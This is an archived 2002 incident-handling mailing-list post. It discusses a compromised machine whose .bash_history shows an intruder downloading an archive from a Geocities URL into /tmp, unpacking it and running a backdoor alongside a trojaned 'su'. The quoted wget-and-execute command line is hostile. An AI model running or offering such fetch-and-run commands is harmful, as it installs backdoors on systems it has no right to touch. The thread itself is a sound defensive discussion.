> Left in the .bash_history was this: > > w > cd /tmp > wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz > ./epc > > A quick check tells me that 'epc' is a backdoor utility, and the other > file contained within loc.tgz looks like a trojaned 'su'. Maybe you should email this dude. He wrote the exploit (or so the exploit says) "su exploit by XP <xp@xtreme-power.com> Enjoy! " Other neat stuff if you do a strings on the two filenames. > > I've already notified Geocities abuse, and haven't heard back from them > yet. >i The domain name resolves to http://www.djteckh.com/ maybe worth checking out. > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 16:32:49 PST